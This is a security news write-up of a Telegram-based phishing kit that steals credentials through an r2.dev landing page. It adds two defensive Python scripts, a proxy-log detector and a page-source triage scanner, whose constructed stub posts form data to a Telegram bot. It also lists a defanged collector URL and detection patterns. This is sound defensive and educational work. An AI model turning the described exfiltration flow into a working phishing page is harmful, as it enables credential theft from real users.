Telegram, a popular messaging platform with open APIs, has become a vector for escalating phishing attacks. Threat actors are exploiting the platform’s accessibility to create malicious bots and applications designed to steal user credentials.
These attacks leverage Telegram’s features to distribute phishing links, impersonate legitimate entities, and deceive users into compromising sensitive information.
A phishing email lures victims with a button disguised as a document viewer. Clicking it leads to a malicious URL on Cloudflare’s r2.dev storage, which hosts a phishing landing page.
The page utilizes JavaScript with jQuery to handle form submissions. When the user enters credentials, a client-side script triggers a POST request, exfiltrating the stolen data (likely including email address and credentials) to a Telegram bot.
The landing page's script implements a function that exfiltrates visitor data by building a detailed message from several collected data points, including any captured credentials.
That message is then transmitted to a designated Telegram chat via an API request, completing the data theft and potentially enabling further phishing attacks against the victim.
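As an added example (not from the article or from Forcepoint's report), the following Python script shows one way a defender can spot this exfiltration pattern in web-proxy logs: a browser-originated POST to the Telegram Bot API whose Referer is a third-party web page rather than a Telegram property. Server-side automation that legitimately talks to the Bot API (no browser user agent, no page referer) is left alone. The log format, client addresses, hostnames and the bot token are all constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

# Constructed proxy log excerpt (not taken from the article). One event per line:
#   <timestamp> <client_ip> <method> <url> referer=<url or -> ua=<user agent>
SAMPLE_PROXY_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 GET https://pub-exampleabc.r2.dev/docview.html referer=- ua=Mozilla/5.0 (Windows NT 10.0) Chrome/124.0
2024-05-01T10:00:31Z 10.0.0.5 POST https://api.telegram.org/bot1234567890:AAExampleTokenConstructedForDemo_xx/sendMessage referer=https://pub-exampleabc.r2.dev/ ua=Mozilla/5.0 (Windows NT 10.0) Chrome/124.0
2024-05-01T10:02:00Z 10.0.0.9 POST https://api.telegram.org/bot1234567890:AAExampleTokenConstructedForDemo_xx/sendMessage referer=- ua=curl/8.5.0
2024-05-01T10:03:15Z 10.0.0.7 GET https://web.telegram.org/a/ referer=- ua=Mozilla/5.0 (Windows NT 10.0) Chrome/124.0
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "
    r"referer=(?P<referer>\S+) ua=(?P<ua>.*)$"
)
# Bot API paths look like /bot<numeric id>:<secret>/<method>; the secret class is kept lenient.
BOT_PATH_RE = re.compile(r"^/bot(?P<bot_id>\d{6,12}):(?P<secret>[A-Za-z0-9_-]{30,})/(?P<api_method>\w+)$")
TELEGRAM_DOMAINS = ("telegram.org", "t.me")


def parse_line(line):
    """Return the fields of one constructed-format log line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def is_telegram_host(host):
    return host is not None and any(host == d or host.endswith("." + d) for d in TELEGRAM_DOMAINS)


def redact_token(bot_id, secret):
    """Keep enough of the token to correlate findings without storing a usable secret."""
    return f"{bot_id}:{secret[:4]}...REDACTED"


def find_browser_bot_api_posts(log_text):
    """Flag POSTs to api.telegram.org/bot<token>/<method> that a browser made on behalf of
    a non-Telegram web page. Browsers under the default referrer policy may send only the
    page origin cross-site, so the referer host is what we key on."""
    findings = []
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None or ev["method"] != "POST":
            continue
        target = urlparse(ev["url"])
        if target.hostname != "api.telegram.org":
            continue
        path = BOT_PATH_RE.match(target.path)
        if path is None:
            continue
        ref_host = urlparse(ev["referer"]).hostname if ev["referer"] != "-" else None
        browser_origin = ev["ua"].startswith("Mozilla/")
        if not (browser_origin and ref_host and not is_telegram_host(ref_host)):
            continue  # server-side tooling or Telegram's own web client: not this pattern
        findings.append({
            "ts": ev["ts"],
            "client": ev["client"],
            "referer_host": ref_host,
            "bot_id": path["bot_id"],
            "token": redact_token(path["bot_id"], path["secret"]),
            "api_method": path["api_method"],
        })
    return findings


def block_candidates(findings):
    """Referer hosts worth adding to a web-proxy blocklist, derived from the findings."""
    return sorted({f["referer_host"] for f in findings})


if __name__ == "__main__":
    for f in find_browser_bot_api_posts(SAMPLE_PROXY_LOG):
        print(f)
    print("block:", block_candidates(SAMPLE_PROXY_LOG and find_browser_bot_api_posts(SAMPLE_PROXY_LOG)))
```

The referer host is the useful output: the phishing page itself is what gets blocked and hunted for, while the bot token is kept only in redacted form for correlating sightings across clients.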
The script processes phishing landing pages by extracting a Base64-encoded hash from the URL, decoding it, and storing the result in the ‘ai’ variable. If ‘ai’ is populated, the script attempts to fetch and display logos associated with domains derived from an email address.
It also utilizes Telegram bot tokens and chat IDs for message sending (BOT_TOKEN, CHAT_ID) and potential logging (LOGGER_TOKEN, LOGGER_ID), along with a Base64-encoded URL stored in the ‘FILE’ variable.
The form submission handler intercepts the default form submission behavior triggered by clicking the ‘submit-btn’ button. By employing ‘event.preventDefault()’, it suppresses the browser’s automatic form data transmission and page reload.
It enables custom JavaScript logic to handle the form submission process, offering greater control over data handling and user experience compared to traditional form submission methods.
The code validates the email format using a regular expression and ensures the password length exceeds four characters. Upon successful validation, it asynchronously sends user data, including email, password, browser details, language, and MX record, to a Telegram bot via AJAX.
Based on the bot’s response, the script either displays an error message or simulates a successful login by redirecting the victim to a specified PDF document, so the flow resembles a genuine authentication step.
According to Forcepoint, the script uses several helper functions to gather and transmit visitor data. `handleBase64Data` decodes potentially sensitive information such as URLs.
`GetBrowserandLanguage` retrieves user agent details. `logVisitorToTelegram` asynchronously logs visitor email (likely for marketing) to a Telegram channel via a logger bot.
Asynchronous functions `getMXRecord` and `getVisitorIP` fetch domain MX records and visitor IP details (potentially including city, country, and region) from external services, possibly for verification or targeting purposes.
The `FILE` variable, containing a decoded Base64 string resembling a URL, suggests visitor information might be sent to a specific destination (“hxxps[://]goldviseinvesmenu[.]com/levels/ll[.]php”).
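As an added example, not code from the article, from Forcepoint, or from the kit it describes, this Python triage script pulls the indicators discussed above out of a captured landing-page source: bot tokens (redacted in the output), chat IDs, the Telegram API endpoint and methods referenced, the form-submission hook, and any quoted Base64 literal that decodes to a URL, which it defangs in the article's own style. It also decodes the Base64 value carried in a lure URL's hash so a responder can identify the targeted address for notification. The sample source, collector URL, bot tokens and lure URL are all constructed.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed stand-in for a captured landing-page script: a declaration-only stub for the
# scanner to work on, not the kit the article describes.
_SAMPLE_FILE_URL = "https://collector.example.test/levels/ll.php"  # constructed
SAMPLE_SOURCE = f"""
const BOT_TOKEN = "1234567890:AAExampleTokenConstructedForDemo_xx";
const CHAT_ID = "-1001234567890";
const LOGGER_TOKEN = "2345678901:AAAnotherConstructedLoggerTokenDemo";
const LOGGER_ID = "987654321";
const FILE = "{base64.b64encode(_SAMPLE_FILE_URL.encode()).decode()}";
$("#submit-btn").on("click", function (event) {{
  event.preventDefault();
  $.ajax({{ url: "https://api.telegram.org/bot" + BOT_TOKEN + "/sendMessage", type: "POST" }});
}});
"""
# Constructed lure URL whose hash carries a Base64-encoded target address.
SAMPLE_LURE_URL = "https://pub-exampleabc.r2.dev/docview.html#" + base64.b64encode(b"victim@example.com").decode()

TOKEN_RE = re.compile(r"\b(\d{6,12}):([A-Za-z0-9_-]{30,})")   # <bot id>:<secret>, lenient length
ID_RE = re.compile(r"\b(\w*_ID)\s*=\s*[\"']?(-?\d{4,})")       # CHAT_ID / LOGGER_ID assignments
API_RE = re.compile(r"https?://api\.telegram\.org/bot")
METHOD_RE = re.compile(r"/(send[A-Za-z]+)")                     # sendMessage, sendDocument, ...
B64_RE = re.compile(r"[\"']([A-Za-z0-9+/]{16,}={0,2})[\"']")    # quoted Base64-looking literals


def redact_token(bot_id, secret):
    return f"{bot_id}:{secret[:4]}...REDACTED"


def defang(url):
    """Render a URL non-clickable: https://a.b/c.php -> hxxps[://]a[.]b/c[.]php"""
    if "://" not in url:
        return url.replace(".", "[.]")
    scheme, rest = url.split("://", 1)
    return scheme.replace("http", "hxxp") + "[://]" + rest.replace(".", "[.]")


def decode_url_literals(source):
    """Return defanged URLs hidden in Base64 string literals (the FILE-variable trick)."""
    found = []
    for lit in B64_RE.findall(source):
        try:
            text = base64.b64decode(lit, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.startswith(("http://", "https://")):
            found.append(defang(text))
    return found


def decode_url_fragment(url):
    """Decode a Base64 value from a lure URL's hash; returns None if absent or undecodable."""
    frag = urlparse(url).fragment
    if not frag:
        return None
    padded = frag + "=" * (-len(frag) % 4)  # tolerate stripped padding
    for decoder in (base64.b64decode, base64.urlsafe_b64decode):
        try:
            return decoder(padded).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def triage_landing_page(source):
    """Summarise Telegram-exfiltration indicators present in a captured page script."""
    tokens = [redact_token(b, s) for b, s in TOKEN_RE.findall(source)]
    report = {
        "bot_tokens": tokens,
        "chat_ids": dict(ID_RE.findall(source)),
        "telegram_api": bool(API_RE.search(source)),
        "api_methods": sorted(set(METHOD_RE.findall(source))),
        "hooks_form_submit": "preventDefault" in source and "submit" in source,
        "decoded_urls": decode_url_literals(source),
    }
    kit = report["telegram_api"] and tokens and (report["hooks_form_submit"] or report["decoded_urls"])
    report["verdict"] = "telegram-exfil-kit" if kit else "inconclusive"
    return report


if __name__ == "__main__":
    print(triage_landing_page(SAMPLE_SOURCE))
    print("targeted address:", decode_url_fragment(SAMPLE_LURE_URL))
```

The verdict deliberately requires more than a bot token: tokens also appear in benign notification scripts, so the scanner looks for the token together with the API endpoint and either the form hook or a hidden collector URL before calling the page a kit.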